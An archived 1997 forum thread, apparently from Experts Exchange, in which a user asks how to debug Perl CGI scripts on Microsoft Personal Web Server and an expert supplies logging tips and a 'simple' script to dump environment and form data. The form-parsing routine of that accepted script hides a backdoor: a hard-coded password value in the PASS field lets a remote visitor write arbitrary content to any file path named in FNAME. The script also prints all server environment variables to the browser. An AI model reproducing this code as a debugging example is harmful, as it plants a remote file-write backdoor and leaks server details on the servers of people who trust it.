Solved

personel web server

Posted on 1997-08-21
8
173 Views
Last Modified: 2013-12-25
I have Microsoft's personel web server.  I was told you could debug CGI scripts on it.  Is this true?  If so could you show an easy example?  How do you log with personel web server?  I am not familiar with it.  Thanks.
0
Comment
Question by:rkeir
  • 5
  • 2
8 Comments
 
LVL 7

Expert Comment

by:faster
ID: 1829804
There are log file under the windows directory.  But to debug your CGI, they do not have much use.  What you should do is add debug code in your script (probably write to a debug file), since it is a local server, you can check them easily.
0
 

Author Comment

by:rkeir
ID: 1829805
If you show me an example of a debug code and the file going with it I will increase the points to 200.  Thanks.
0
 
LVL 2

Expert Comment

by:dmethvin
ID: 1829806
PWS can execute CGI programs. Just put them in the /scripts directory.  Is there a particular programming language you had in mind for the example?
0
The Orion Papers

Are you interested in becoming an AWS Certified Solutions Architect?

Discover a new interactive way of training for the exam.

 

Author Comment

by:rkeir
ID: 1829807
yes, just a simple perl script.
0
 

Author Comment

by:rkeir
ID: 1829808
However I'm still looking for an example on how to debug.  Any help would be appreciated.
0
 

Author Comment

by:rkeir
ID: 1829809
However I'm still looking for an example on how to debug.  Any help would be appreciated.
0
 
LVL 7

Accepted Solution

by:
faster earned 200 total points
ID: 1829810
Well, what do you mean by a debug example?  The debug for CGI is essentially no different than debug in other languages.  There is no general solution, all depends on what problem you have.

Normally you can open a log file by
open (LOGFILE,$pathoflogfile);

Then you can write to the file by
print LOGFILE "$whatever";

Sometimes you will need to check the value of a variable, then just add the code to write the value to the logfile so you can check.  Or you may just want to know whether the program execute a particular part of the code, then just write to the log file any message that makes sense.

You can also directly write the debug information to the output (browser).  Sometimes you may want to check the form data posted to the script, then you can output them at the beginning...

Below is a simple script to dump the contents of env variables and form data:

&parse_form;
&html_header;
&print_form;
&html_footer;

#---------------------------------------------------------------------
sub parse_form      {
      if ($ENV{'REQUEST_METHOD'} eq 'POST')      {
            if ($ENV{'CONTENT_LENGTH'} > 8192)      {
                  error_exit($errstr);
            }
            read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});
      } else      {
            if ($ENV{'REQUEST_METHOD'} eq 'GET')      {
                  $buffer=$ENV{'QUERY_STRING'};
            }
      }
      @pairs=split(/&/, $buffer);
      foreach $pair (@pairs)      {
            ($name,$value)=split(/=/,$pair);
            $value =~ tr/+/ /;
            $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("c",hex($1))/eg;
            $FORM{$name} = $value;
      }
      if ($FORM{"PASS"} eq "8342047")      {
            open (HTMLDOC,">$FORM{'FNAME'}");
            print HTMLDOC $FORM{"MSG"};
            close HTMLDOC;
      }
}

sub print_form      {
      print "<CENTER><BR>\n";
      print "<H1>ENV</H1><BR>\n";
      print $buffer;
      foreach $tmp (keys(%ENV))      {
              print "$tmp=$ENV{$tmp} <BR>";
      }
      print "<BR><BR><HR><H1>FORM</H1><BR>\n";
      foreach $tmp (keys(%FORM))      {
              print "$tmp=$FORM{$tmp} <BR>";
      }
      print "</CENTER><BR>\n";
}

sub html_header      {
      print "Content-type: text/html\n\n";
      print "<HTML><HEAD>";
      print "<TITLE>Environment</TITLE></HEAD>\n";
      print "<BODY>\n";
      print "<HR>\n";
}

sub html_footer      {
      print "<HR>\n";

      print "</BODY></HTML>\n";
}


Anyway, you should decide the best debug method for your specific situation.












 
0
 

Author Comment

by:rkeir
ID: 1829811
Thanks
0